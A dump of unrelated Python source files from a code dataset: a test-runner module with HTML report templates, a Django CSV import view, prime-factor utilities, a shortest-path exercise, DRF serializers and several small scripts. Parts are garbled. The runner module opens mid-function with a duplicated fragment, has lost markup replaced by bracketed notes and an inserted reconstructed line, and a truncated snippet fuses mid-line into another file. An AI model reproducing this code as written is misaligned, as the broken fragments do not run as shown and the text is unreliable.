None:\n logger.error(msg)\n else:\n print(msg)\n #ses.login()\n dictDUTs[dutname]=ses\n return ses\n except Exception as e:\n msg = '\\ncan\\'t init dut(%s)\\n%s\\n'%(dutname, e.__str__())\n for p 
#@logAction\ndef initDUT(errormessage, bench, dutnames, logger=None, casepath='./', shareData=None, dry_run=False):\n dictDUTs = {}\n\n def connect2dut(InitErrorMessage, dutname, dut_attr, logger=None, path='./', shareData=None, dry_run=False):\n msg = ''\n try:\n import os\n if dut_attr[\"SUT\"].strip() == '':\n if os.name != 'nt':\n raise ImportError('need to implement a default session for non-NT')#sutattr['SUT'] ='Session'\n else:\n dut_attr['SUT'] = 'winTelnet'\n\n classname = dut_attr[\"SUT\"]\n ModuleName = __import__(classname)\n ClassName = ModuleName.__getattribute__(classname)\n\n ses = ClassName(dutname, dut_attr, logger=logger, logpath=path, shareData=shareData)\n try:\n ses.dry_run = dry_run\n except Exception as e:\n msg = '%s does not support dry_run'%(dutname)\n if logger is not None:\n logger.error(msg)\n else:\n print(msg)\n #ses.login()\n dictDUTs[dutname] = ses\n return ses\n except Exception as e:\n msg = '\\ncan\\'t init dut(%s)\\n%s\\n'%(dutname, e.__str__())\n for p in sorted(sys.path):\n print(p)\n if type(InitErrorMessage) == type(''):\n InitErrorMessage += msg\n elif type(InitErrorMessage) == type([]):\n InitErrorMessage.append(msg)\n else:\n InitErrorMessage = [msg]\n print(traceback.format_exc())\n raise e#ValueError(msg)\n import threading\n dutobjs = []\n\n for dutname in dutnames:\n th = threading.Thread(target=connect2dut, args=[errormessage, dutname, bench[dutname], logger, casepath, shareData, dry_run])\n dutobjs.append(th)\n for th in dutobjs:\n th.start()\n\n for th in dutobjs:\n th.join()\n if len(errormessage) != 0 or (len(dictDUTs) != len(dutnames)):\n if type(errormessage) == type([]):\n errormessage = '\\n\\t'.join(errormessage)\n raise Exception(errormessage)\n return dictDUTs\n\n\nCASE_MODE = set(['full', 'f',\n 'setup', 's',\n 'run', 'r',\n 'tear', 't', 'teardown',\n 'nosetup', 'ns',\n 'norun', 'nr',\n 'notear', 'noteardown', 'nt',\n ])\n#@logAction\ndef run(casename, duts, seqs, mode, logger, sharedata):\n global CASE_MODE\n import datetime\n def analyzeStep(casename, dut, command, expect, wait):\n funName = dut.defaultFunction\n if mode not in CASE_MODE:\n raise ValueError('case mode is wrong, should be one of %s'%(str(CASE_MODE)))\n\n def runSegment(casename, mode, modeset, duts, seq, segName, logger):\n\n if mode in modeset:\n segment = segName\n stepindex = 1\n for dut, cmd, expect, due, lineno in seq:\n\n session = duts[dut]\n stepinfo = \"\"\"\n###############################################################################\n# %s\n# Case: %s, LineNo:%d, %s.%d\n# DUT(%s) Action(%s),Exp(%s),Wait(%s)\n###############################################################################\n\"\"\"%(datetime.datetime.now().isoformat('_'), casename, lineno, segment, stepindex,\n dut, cmd, expect, due)\n session.info('segment', segment)\n session.info('LineNo', lineno)\n session.info('step Index', stepindex)\n session.info('dut', dut)\n session.info('action', cmd)\n session.info('EXPECT', expect)\n session.info('due', due)\n print(stepinfo)\n\n session.stepCheck(casename, lineno, cmd, expect, due)\n session.show()\n stepindex += 1\n\n\n modeset = [\n ['full', 'setup', 'norun', 'notear', 's', 'nr', 'nt', 'f'],\n ['full', 'run', 'nosetup', 'notear', 'r', 'ns', 'nt', 'f'],\n ['full', 'tear', 'norun', 'nosetup', 't', 'nr', 'ns', 'f']\n ]\n seqlist = [seqs[0],\n seqs[1],\n seqs[2]\n ]\n segNamelist = ['setup', 'run', 'teardown']\n index = 0\n totalseg = len(seqlist)\n while index < totalseg:  # condition and body were garbled in extraction; reconstructed from the surrounding definitions\n runSegment(casename, mode, modeset[index], duts, seqlist[index], segNamelist[index], logger)\n index += 1\n
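# Added summary (derived from the modeset rows above; not original text):\n#   'full'/'f'    -> setup + run + teardown\n#   'setup'/'s'   -> setup only        'nosetup'/'ns' -> run + teardown\n#   'run'/'r'     -> run only          'norun'/'nr'   -> setup + teardown\n#   'tear'/'t'    -> teardown only     'notear'/'nt'  -> setup + run\n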
    [suite-report HTML template: markup was lost in extraction; recoverable cells follow]
    Suite Test Report %s  |  status banner %s
    Start Time | End Time | Duration(H:M:S)  ->  %s | %s | %s
    SUITE NAME | ARGUMENTS | CASE RANGE  ->  %s | %s | %s
    TOTAL CASE | PASS | FAIL | NOT RUN  ->  %d | %d | %d | %d  (percentages: %s | %s | %s)
    \n\n\"\"\"%(finish_status,finish_status, time.strftime('%Y-%m-%d:%H:%M:%S', time.localtime(suiteStartTime)), time.strftime('%Y-%m-%d:%H:%M:%S', time.localtime(suiteEndTime)),suit_duration_str,reportname, CaseRangeStr, ArgStr ,TOTAL, CASEPASS, CASEFAIL, CASENOTRUN, PPASS,PFAIL,PNOTRUN)\n\n response = response+ ''''''\n #NewRecord = [index,caseResult,caseline[2][1], errormessage,logdir, LineNo]\n for result in Report:\n index, caseResult, caseLine, errormessage, logdir, LineNo, ExecutionDuration, caseStartTime, caseEndTime =result\n caseStartTime =time.strftime('%Y-%m-%d:%H:%M:%S', time.localtime(caseStartTime))\n caseEndTime =time.strftime('%Y-%m-%d:%H:%M:%S', time.localtime(caseEndTime))\n if errormessage in ([] , None, ''):\n errormessage='-'\n if type(errormessage)==type([]):\n errormessage='
    '.join(errormessage)\n if type(errormessage)!=type(''):\n errormessage =pprint.pformat(errormessage)\n\n if errormessage:\n m = re.search('\\*ERROR MESSAGE:(.*?)\\*Traceback',errormessage,re.IGNORECASE|re.DOTALL)\n if m:\n errormessage=m.group(1).replace('*\\t','')\n errormessage = re.sub('\\'|\\\"', '', errormessage )\n errormessage= re.sub('\\\\\\\\n',' ', errormessage)\n errormessage= re.sub('\\\\\\\\r',' ', errormessage)\n errormessage= re.sub('\\\\\\\\t',' ', errormessage)\n errormessage= re.sub('\\r\\n',' ',errormessage)\n errormessage= re.sub('\\n|\\r',' ',errormessage)\n import unicodedata\n try:\n errormessage = unicode(errormessage, errors='ignore')\n errormessage =unicodedata.normalize('NFKD',errormessage ).encode('ascii','ignore')\n except TypeError:\n pass\n #errormessage= errormessage.decode().decode()\n max_length_of_error_message=100\n short_error= errormessage[:max_length_of_error_message]+'...' if len(errormessage)>max_length_of_error_message else errormessage[:max_length_of_error_message]\n bgcolor=\"#00FF00\"\n if caseResult=='FAIL':\n bgcolor = \"#FF0000\"\n\n response = response +\"\"\"\n \n \n \n \n \n \n \n \n \n\"\"\"%(index,bgcolor,logdir,caseResult,logdir,caseLine, ExecutionDuration,caseStartTime,caseEndTime, LineNo,errormessage, short_error)\n\n return response+\"\"\"
    [per-case results table template: markup was lost in extraction; recoverable header and row format]
    No. | Result | Case Name | Duration(s) | StartTime | EndTime | Line No | Error Message
    row format: %d | %s | %s | %s | %s | %s | %s | %s
    \n\"\"\"\n\n","sub_path":"lib/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":27897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"452628064","text":"from sys import exit\nX,Y,Z = [int(n) for n in input().split()]\n# N = int(input())\n# a = [int(input()) for _ in range(N)]\n# L = len(S)\n# T = str(input())\nans = 0\nb = max(Y,Z)\nwhile(X>b):\n ans+=1\n X-=Z\n X-=Y\nprint(ans-1 if X 1:\n model.write(sys.argv[1])\n","sub_path":"examples/delay/4hfspat_delay.py","file_name":"4hfspat_delay.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"428909835","text":"import csv\nimport os\n\nfrom django.shortcuts import render\nfrom bikelog.models import Journey\n\n\ndef list_csv(request):\n linelist = []\n csv_file = \"{0}/Dropbox/Apps/Drafts/bike-log.csv\".format(os.environ[\"HOME\"])\n fileinfo = os.stat(csv_file)\n if fileinfo.st_size != 0:\n no_journies = False\n no_journies_message = \"\"\n with open(csv_file, \"r\", encoding=\"UTF-8\") as f:\n reader = csv.reader(f)\n for line in reader:\n linelist.append(line)\n else:\n no_journies = True\n no_journies_message = \"There are no journies to import.\"\n \n # We want a different message asking us to import based on whether there is one or multiple journies\n if len(linelist) == 1:\n import_message = \"Do you want to import this journey?\"\n else:\n import_message = \"Do you want to import these journies?\"\n\n # Now we deliver the context variables to the render template\n context = {\n 'linelist': linelist,\n 'no_journies': no_journies,\n 'import_message': import_message,\n 'no_journies_message': no_journies_message\n }\n return render(request, 'import_journies.html', context)\n\n\ndef import_csv(request):\n csv_file = \"{0}/Dropbox/Apps/Drafts/bike-log.csv\".format(os.environ[\"HOME\"])\n with open(csv_file, \"r\", encoding=\"UTF-8\") as f:\n reader = csv.reader(f)\n for line in reader:\n journey = Journey(date=line[0], commute=line[1], distance=line[2], leg=line[3], notes=line[4])\n journey.save()\n with open(csv_file, \"w\", encoding=\"utf-8\") as f:\n f.seek(0)\n f.truncate()\n context = {\n 'success': \"Journies imported.\"\n }\n return render(request, 'imported.html', context)\n\n\n\n","sub_path":"bikelog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"102220835","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__=\"Steven\"\n__date__ =\"$Jun 16, 2014 10:37:58 AM$\"\n\nimport math\nimport sys\n\n#========================================================================================\nclass Primes:\n 'Provides functionality for finding prime factors.'\n \n #======================================================================================\n def is_prime(self, aNum):\n 'Determine if a number is prime or not'\n retVal = True\n maxVal = math.floor( math.sqrt(aNum) )\n for i in range(2,maxVal+1):\n if (aNum % i == 0):\n retVal = False\n break\n\n return retVal\n \n #======================================================================================\n def get_all_factors_for(self, N):\n 'Find all the factors (not necessarily prime) of a given number N'\n myFactors = []\n maxVal = 
math.floor(N/2)\n for i in range(2,maxVal+1):\n if (N % i == 0):\n myFactors.append(i) \n\n return myFactors\n\n #======================================================================================\n def get_highest_prime_factor_for(self, N):\n 'Find highest prime factor of a number. If the number is prime it returns that number'\n highestPrimeFactor = N\n if not self.is_prime(N):\n maxVal = math.floor( N/2 )\n\n for i in range(maxVal,1,-1):\n if (N % i == 0) and (self.is_prime(i)):\n highestPrimeFactor = i\n break\n\n return highestPrimeFactor\n \n #=======================================================================================\n def get_prime_factors_for(self, myNum):\n 'Find the prime factors for a given number; e.g. Given 44 would return 2 2 11'\n factorList = []\n currentNum = myNum\n stillLooking = True\n while (stillLooking):\n highestPrime = self.get_highest_prime_factor_for(currentNum)\n \n if (currentNum > 2):\n factorList.append(highestPrime)\n currentNum = math.floor(currentNum/highestPrime)\n elif (currentNum == 2): #-- special edge case\n factorList.append(highestPrime)\n stillLooking = False\n else:\n stillLooking = False\n\n return sorted(factorList)\n\n \n#-- End Class Prime Factors --\n#========================================================================================\n\n#========================================================================================\nif __name__ == \"__main__\":\n \n pf = Primes()\n n = 1;\n userInput = input(\"Enter your name: \")\n print(\"Hello %s!\" % userInput)\n while (n != 0):\n n = input(\"Please enter an integer > 2 (0 to quit): \")\n n = int(n)\n if (n == 0):\n print(\"Goodbye!\")\n elif (n < 2):\n print(\"Input value out of range!\")\n n = 2\n else:\n print(\"Hello number: %s!\" % n)\n print(\"Your prime factors are: \")\n print(\"%s\" % pf.get_prime_factors_for(n))\n print(\"\")\n\n","sub_path":"Python/PrimeFactors/src/primefactors.py","file_name":"primefactors.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"86194730","text":"\"\"\"\nThere are 10 wizards, 0-9, you are given a list that each entry i is a list of \nwizards known by wizard i. Define the cost between wizards and wizard as square of \ndifferent of i and j. 
Find the min cost between given two wizards.\n\"\"\"\nimport heapq\ndef min_cost_wizards(relations, source, target):\n \"\"\"\n Use relations as the adjacent table and use a heap to maintain the min cost\n between two nodes.\n \"\"\"\n pq = []\n for neighbor in relations[source]:\n heapq.heappush(pq, ((source - neighbor) ** 2, neighbor, [source, neighbor]))\n \n while len(pq) > 0:\n cost, wizard, path = heapq.heappop(pq)\n if wizard == target:\n return path\n elif len(path) < 10: # length of path cannot exceed 10\n for neighbor in relations[wizard]:\n heapq.heappush(pq, (cost + (neighbor - wizard) ** 2, neighbor, path + [neighbor]))\n return [] # source cannot know target\n \n# test\nimport unittest\nclass Tester(unittest.TestCase):\n def test(self):\n relations1 = [\n [1,2], [3], [3,4], [4], []\n ]\n self.assertEqual([0, 1, 3, 4], min_cost_wizards(relations1, 0, 4))\n relations2 = [\n [1,2], [3], [3,4], [], [], [4], [], [], [], [] \n ]\n self.assertEqual([], min_cost_wizards(relations2, 0, 9))\n relations3 = [\n [1, 5, 9], [2, 3, 9], [4], [], [], [9], [], [], [], []\n ]\n self.assertEqual([0, 5, 9], min_cost_wizards(relations3, 0, 9))\n relations4 = [\n [1], [0], []\n ]\n self.assertEqual([], min_cost_wizards(relations4, 0, 2))\n \n \nunittest.main()\n","sub_path":"src/main/python/company/min_cost_wizards.py","file_name":"min_cost_wizards.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"41471618","text":"# coding: utf-8\nimport json\nimport chardet\n\n# strlist = '[1, 2, 3, 4]'\n# strdict = '{\"city\": \"shenzhen\", \"name\": \"amamam\"}'\n#\n# print(json.loads(strlist))\n# print(json.loads(strdict))\n\n\n# list = [1, 2, 3, 4]\n# tuple = (1, 2, 3, 4)\n# dict = {\"city\": \"北京\", \"name\": \"大猫\"}\n#\n# print(json.dumps(list))\n# print(json.dumps(tuple))\n# print(json.dumps(dict))\n# print(json.dumps(dict, ensure_ascii=False))\n#\n# print(chardet.detect(json.dumps(dict)))\n\n\nlist_str = [{\"city\": \"北京\", \"name\": \"大猫\"}]\njson.dump(list_str, open('file/list_str.json', 'w'), ensure_ascii=False)\n\ndictStr = {\"city\": \"北京\", \"name\": \"大刘\"}\njson.dump(dictStr, open('file/dictstr.json', 'w'), ensure_ascii=False)\n\n\nprint(json.load(open('file/list_str.json')))\nprint(json.load(open('file/dictstr.json')))\n","sub_path":"06/02/15_json.py","file_name":"15_json.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"612405971","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import serializers\nfrom .. 
import models\nfrom datetime import date\nfrom users.models import User\n\n\nclass AddressSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Address\n fields = \"__all__\"\n\n\nclass SimplifiedCompanySerializer(serializers.ModelSerializer):\n advertising_this_year = serializers.IntegerField()\n\n class Meta:\n model = models.Company\n fields = (\n \"id\",\n \"ico\",\n \"name\",\n \"phone_number\",\n \"ad_volume\",\n \"status\",\n \"status_color\",\n \"contact_address\",\n \"billing_address\",\n \"contacts\",\n \"user\",\n \"orders\",\n \"events\",\n \"advertising_this_year\"\n )\n depth = 1\n\n def get_fields(self, *args, **kwargs):\n fields = super(SimplifiedCompanySerializer, self).get_fields(*args, **kwargs)\n request = self.context.get(\"request\", None)\n if request and getattr(request, \"method\", None) == \"PUT\":\n fields[\"ico\"].required = False\n fields[\"contact_address\"].required = False\n fields[\"billing_address\"].required = False\n fields[\"user\"].required = False\n\n if request and getattr(request, \"method\", None) in [\"PUT\", \"POST\"]:\n # remove non-model field\n fields[\"ico\"].required = False\n fields[\"notes\"].required = False\n fields[\"create_date\"].required = False\n fields[\"modification_date\"].required = False\n fields[\"status_modification_date\"].required = False\n fields[\"user\"].required = False\n del fields[\"advertising_this_year\"]\n return fields\n\n def create(self, validated_data: dict):\n\n request = self.context.get(\"request\", None)\n contact_address = None\n billing_address = None\n if \"contact_address\" in validated_data:\n contact_address = models.Address.objects.create(**validated_data.pop(\"contact_address\"))\n if \"billing_address\" in validated_data:\n billing_address = models.Address.objects.create(**validated_data.pop(\"billing_address\"))\n\n company = models.Company.objects.create(**validated_data)\n if \"status\" in validated_data or \"status_color\" in validated_data:\n company.status_modification_date = date.today()\n company.create_date = date.today()\n company.modification_date = date.today()\n company.contact_address = contact_address\n company.billing_address = billing_address\n company.user = request.user\n company.save()\n return company\n\n def update(self, company: models.Company, validated_data: dict):\n request = self.context.get(\"request\", None)\n if \"update_user\" in validated_data:\n update_user = validated_data.pop(\"update_user\")\n if update_user is True:\n company.user = request.user\n if \"user\" in validated_data:\n request_user = validated_data.pop(\"user\")\n if request_user is None:\n company.user = None\n else:\n user = get_object_or_404(User, email=request_user)\n company.user = user\n if \"status\" in validated_data or \"status_color\" in validated_data:\n company.status_modification_date = date.today()\n if \"contact_address\" in validated_data:\n contact_address_data = validated_data.pop(\"contact_address\")\n if company.contact_address:\n company.contact_address.update(contact_address_data)\n else:\n contact_address = models.Address.objects.create(**contact_address_data)\n company.contact_address = contact_address\n if \"billing_address\" in validated_data:\n billing_address_data = validated_data.pop(\"billing_address\")\n if company.billing_address:\n company.billing_address.update(billing_address_data)\n else:\n billing_address = models.Address.objects.create(**billing_address_data)\n company.billing_address = billing_address\n company.modification_date = date.today()\n 
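        # Assumption (added comment): company.update(...) on the next line is a\n        # project-specific instance helper that assigns the remaining validated\n        # fields (the Address instances above are updated the same way); it is\n        # not Django's QuerySet.update(), which is unavailable on a single instance.\n        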
company.update(validated_data)\n return company\n\n def validate(self, attrs):\n if \"ico\" in attrs and len(attrs[\"ico\"]) != 8:\n raise serializers.ValidationError({\"ico\": \"ico must have exactly 8 digits\"})\n return attrs\n\n\nclass CompanyNameSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Company\n fields = (\n \"id\",\n \"ico\",\n \"name\"\n )\n","sub_path":"backend/company/serializers/nested.py","file_name":"nested.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"367006667","text":"g = open(\"primes_new.txt\", \"r\")\n_ = g.read().split()\nprimes = [eval(i) for i in _]\ng.close()\n\nfrom math import sqrt\n\nlast = 496094177\n\nf = open(\"primes_new2.txt\", \"w\")\n\ndef is_prime(n):\n\t\n\tglobal primes, last\n\t#print(\"Testing {}\".format(n))\n\n\tfor k in range(last+1, int(sqrt(n))+1):\n\t\tif is_prime(k):\n\t\t\tpass\n\n\tfor p in primes:\n\t\tif p ** 2 > n:\n\t\t\tbreak\n\t\telif n % p == 0:\n\t\t\treturn False\n\n\tif last < n:\n\t\tlast = n\n\t\tprimes.append(n)\n\t#print('Testing {0}'.format(n, last))\n\t\tf.write(str(n))\n\t\tf.write(\"\\n\")\n\treturn True\t\n\n\n\nrate = [4553, 44545]\nnums = [496086529]\nlength = 22273\n\nwhile rate[0] * 10 >= rate[1]:\n\tlength += 1\n\tfor i in range(4):\n\t\tnew = nums[-1] + length\n\t\tnums.append(new)\n\t\tif is_prime(new):\n\t\t\trate[0] += 1\n\trate[1] += 4\n\tlength += 1\n\tprint(\"Length: {0}, Rate: {1}/{2}, Last Number: {3}\".format(length, rate[0], rate[1], nums[-1]))\n\nprint(length)\n#print(primes)\n#print(nums)\nf.close()","sub_path":"resource/code-samples/project-euler/0520P58.py","file_name":"0520P58.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"635665601","text":"from .models import (\n CAUVApp,\n AG_LAND,\n)\n\n\n\ndef recommendation(app_select, AG_LAND_parcel, AG_LAND_land, errors):\n # BASE DATA MODEL FOR RECOMMENDED VALUES\n recommendation_values = {\n 'Commodity_Acres': app_select.Commodity_Acres,\n 'Hay_Acres': app_select.Hay_Acres,\n 'Perm_Pasture_Acres': app_select.Perm_Pasture_Acres,\n 'Noncommercial_Wood_Acres': app_select.Noncommercial_Wood_Acres,\n 'Commerical_Wood_Acres': app_select.Commerical_Wood_Acres,\n 'Other_Crop_Acres': app_select.Other_Crop_Acres,\n 'Homesite_Acres': app_select.Homesite_Acres,\n 'Road_Waste_Pond_Acres': app_select.Road_Waste_Pond_Acres,\n 'CRP_Acres': app_select.CRP_Acres,\n 'Con25_Acres': app_select.Con25_Acres,\n 'Other_Use_Acres': app_select.Other_Use_Acres,\n 'Stated_Total_Acres': app_select.Stated_Total_Acres,\n 'Gross_Income_1': app_select.Gross_Income_1,\n 'Gross_Income_2': app_select.Gross_Income_2,\n 'Gross_Income_3': app_select.Gross_Income_3,\n }\n # ADJUST HOME, CONP, CON25 IF NECESSARY\n temp_adjust = {\n 'Commodity_Acres': app_select.Commodity_Acres,\n 'Hay_Acres': app_select.Hay_Acres,\n 'Perm_Pasture_Acres': app_select.Perm_Pasture_Acres,\n 'Noncommercial_Wood_Acres': app_select.Noncommercial_Wood_Acres,\n 'Commerical_Wood_Acres': app_select.Commerical_Wood_Acres,\n 'Homesite_Acres': app_select.Homesite_Acres,\n 'Other_Crop_Acres': app_select.Other_Crop_Acres,\n 'Road_Waste_Pond_Acres': app_select.Road_Waste_Pond_Acres,\n 'CRP_Acres': app_select.CRP_Acres,\n 'Con25_Acres': app_select.Con25_Acres,\n }\n # FIRST ADJUST HOME, CRP, CON25\n road_final = []\n for each in AG_LAND_land:\n if len(errors) == 0:\n continue\n else:\n if 
each['LAND_USE_TYPE'] == 'HOME':\n temp_adjust['Homesite_Acres'] = each['LAND_USE_ACRES']\n\n elif each['LAND_USE_TYPE'] == 'CONP':\n temp_adjust['CRP_Acres'] = each['LAND_USE_ACRES']\n\n elif each['LAND_USE_TYPE'] == 'CON25':\n temp_adjust['Con25_Acres'] = each['LAND_USE_ACRES']\n\n elif each['LAND_USE_TYPE'] == 'CROP':\n adjust = (\n each['LAND_USE_ACRES'] -\n app_select.Hay_Acres -\n app_select.Perm_Pasture_Acres -\n app_select.Other_Crop_Acres -\n app_select.Other_Use_Acres\n )\n if adjust < 0:\n temp_adjust['Commodity_Acres'] = 0\n hay_adjust = app_select.Hay_Acres + adjust\n if hay_adjust < 0:\n temp_adjust['Hay_Acres'] = 0\n perm_pasture_adjust = app_select.Perm_Pasture_Acres + adjust\n if perm_pasture_adjust < 0:\n temp_adjust['Perm_Pasture_Acres'] = 0\n other_crop_adjust = app_select.Other_Crop_Acres + adjust\n if other_crop_adjust < 0:\n temp_adjust['Other_Crop_Acres'] = 0\n other_use_adjust = app_select.Other_Use_Acres + adjust\n if other_use_adjust <0:\n temp_adjust['Other_Use_Acres'] = 0\n else:\n temp_adjust['Other_Use_Acres'] = other_use_adjust\n else:\n temp_adjust['Other_Crop_Acres'] = other_crop_adjust\n else:\n temp_adjust['Perm_Pasture_Acres'] = perm_pasture_adjust\n else:\n temp_adjust['Hay_Acres'] = hay_adjust\n else:\n temp_adjust['Commodity_Acres'] = adjust\n\n elif each['LAND_USE_TYPE'] == 'WOOD':\n adjust = (\n each['LAND_USE_ACRES'] -\n app_select.Commerical_Wood_Acres\n )\n if adjust < 0:\n temp_adjust['Noncommercial_Wood_Acres'] = 0\n commercial_adjust = app_select.Commerical_Wood_Acres + adjust\n if commercial_adjust < 0:\n temp_adjust['Commerical_Wood_Acres'] = 0\n else:\n temp_adjust['Commerical_Wood_Acres'] = commercial_adjust\n else:\n temp_adjust['Noncommercial_Wood_Acres'] = adjust\n\n elif each['LAND_USE_TYPE'] == 'ROW':\n road_final.append(each['LAND_USE_ACRES'])\n\n elif each['LAND_USE_TYPE'] == 'DTCH':\n road_final.append(each['LAND_USE_ACRES'])\n\n elif each['LAND_USE_TYPE'] == 'WSTE':\n road_final.append(each['LAND_USE_ACRES'])\n\n else:\n pass\n\n temp_adjust['Road_Waste_Pond_Acres'] = round(sum(road_final),3)\n\n # double check there should be no values if not in ag_land\n all_land_types = []\n for each in AG_LAND_land:\n all_land_types.append(each['LAND_USE_TYPE'])\n if 'HOME' not in all_land_types:\n temp_adjust['Homesite_Acres'] = 0\n if 'CONP' not in all_land_types:\n temp_adjust['CRP_Acres'] = 0\n if 'CON25' not in all_land_types:\n temp_adjust['Con25_Acres'] = 0\n\n recommendation_values['Commodity_Acres'] = temp_adjust['Commodity_Acres']\n recommendation_values['Hay_Acres'] = temp_adjust['Hay_Acres']\n recommendation_values['Perm_Pasture_Acres'] = temp_adjust['Perm_Pasture_Acres']\n recommendation_values['Noncommercial_Wood_Acres'] = temp_adjust['Noncommercial_Wood_Acres']\n recommendation_values['Commerical_Wood_Acres'] = temp_adjust['Commerical_Wood_Acres']\n recommendation_values['Other_Crop_Acres'] = temp_adjust['Other_Crop_Acres']\n recommendation_values['Road_Waste_Pond_Acres'] = temp_adjust['Road_Waste_Pond_Acres']\n recommendation_values['Homesite_Acres'] = temp_adjust['Homesite_Acres']\n recommendation_values['CRP_Acres'] = temp_adjust['CRP_Acres']\n recommendation_values['Con25_Acres'] = temp_adjust['Con25_Acres']\n return recommendation_values\n\n\ndef recommendation_sum(recommendation_values):\n app_select = recommendation_values\n app_sum = [\n app_select['Commodity_Acres'],\n app_select['Hay_Acres'],\n app_select['Noncommercial_Wood_Acres'],\n app_select['Perm_Pasture_Acres'],\n app_select['Commerical_Wood_Acres'],\n 
app_select['Other_Crop_Acres'],\n app_select['Homesite_Acres'],\n app_select['Road_Waste_Pond_Acres'],\n app_select['CRP_Acres'],\n app_select['Con25_Acres'],\n app_select['Other_Use_Acres'],\n ]\n return round(sum(app_sum),3)\n","sub_path":"application/RECOMMENDATION.py","file_name":"RECOMMENDATION.py","file_ext":"py","file_size_in_byte":6909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"633269259","text":"# Date: February 4, 2020 (TUE)\n# Link: https://leetcode.com/problems/rotate-array/\n\n\ndef rotate(nums, k):\n tmp_arr = [None] * len(nums)\n for i in range(len(nums)):\n tmp_arr[(i+k) % len(nums)] = nums[i]\n\n for j in range(len(nums)):\n nums[j] = tmp_arr[j]\n print(nums)\n return\n\n\ndef run():\n arr1 = [1, 2, 3, 4, 5, 6, 7]\n i = 3\n rotate(arr1, i)\n\n arr2 = [1, 2]\n j = 1\n rotate(arr2, j)\n return\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"rotate_array.py","file_name":"rotate_array.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"266083708","text":"import sys\nsys.path.append(\"..\")\nfrom timeit import default_timer as clock\nfrom symengine import var, Integer\n\ndef fact(n):\n if n in [0, 1]:\n return 1\n else:\n return n*fact(n-1)\n\ndef diff(e, x, n):\n for i in range(n):\n e = e.diff(x)\n return e\n\ndef legendre(n, x):\n e = Integer(1)/(Integer(2)**n * fact(Integer(n))) * diff((x**2-1)**n, x, n)\n return e.expand()\n\nvar(\"x\")\nfor n in range(10):\n print(n, legendre(n, x))\n\nt1 = clock()\ne = legendre(500, x)\nt2 = clock()\nprint(\"Total time for legendre(500, x):\", t2-t1, \"s\")\n","sub_path":"benchmarks/legendre1.py","file_name":"legendre1.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"515032695","text":"from ansible_server import ansible_server\nfrom multiprocessing import Process, Queue\nfrom Queue import Empty\n\n# DON'T USE THIS UNLESS YOU KNOW WHAT YOU'RE DOING\n# Low level message sending. 
For high level messaging, use send_msg.\ndef send(msg):\n send_queue.put_nowait(msg)\n\n# Use this one instead of send\ndef send_message(msg_type, content):\n send({\n 'header': {'msg_type': msg_type},\n 'content': content\n })\n\n# Receives a message, or None if there is no current message.\ndef recv():\n try:\n return recv_queue.get_nowait()\n except Empty:\n return None\n\n# Start up the Flask-SocketIO server\nsend_queue = Queue()\nrecv_queue = Queue()\nansible_p = Process(target=ansible_server, args=(send_queue, recv_queue))\nansible_p.start()\n\n","sub_path":"runtime/ansible.py","file_name":"ansible.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"240936506","text":"# coding=utf-8\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.mail import send_mail\nfrom django.shortcuts import render\nfrom django.shortcuts import render, render_to_response\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template.context_processors import csrf\n\nfrom main.models import *\nfrom .models import *\n\n\ndef main(request, args={}):\n args.update(csrf(request))\n try:\n head_title = Head_title.objects.get()\n except Head_title.MultipleObjectsReturned:\n head_title = Head_title.objects.all().last()\n args['head_title'] = head_title\n try:\n head = Head.objects.get()\n except Head.MultipleObjectsReturned:\n head = Head.objects.all().last()\n args['head'] = head\n args['headlink'] = HeadLink.objects.all()\n args['head_phone'] = HeadPhone.objects.all()\n args['inter'] = Inter.objects.all()\n args['menu'] = Menu.objects.all()\n try:\n banner = Banner.objects.get()\n except Banner.MultipleObjectsReturned:\n banner = Banner.objects.all().last()\n args['banner'] = banner\n try:\n question_title = QuestionTitle.objects.get()\n except QuestionTitle.MultipleObjectsReturned:\n question_title = QuestionTitle.objects.all().last()\n args['question_title'] = question_title\n try:\n presentation = Presentation.objects.get()\n except Presentation.MultipleObjectsReturned:\n presentation = Presentation.objects.all().last()\n args['presentation'] = presentation\n try:\n callback_title = CallbackTitle.objects.get()\n except CallbackTitle.MultipleObjectsReturned:\n callback_title = CallbackTitle.objects.all().last()\n args['callback_title'] = callback_title\n try:\n video = Video.objects.get()\n except Video.MultipleObjectsReturned:\n video = Video.objects.all().last()\n args['video'] = video\n try:\n advantages_title = AdvantagesTitle.objects.get()\n except AdvantagesTitle.MultipleObjectsReturned:\n advantages_title = AdvantagesTitle.objects.all().last()\n args['advantages_title'] = advantages_title\n try:\n advantages = Advantages.objects.all()\n except 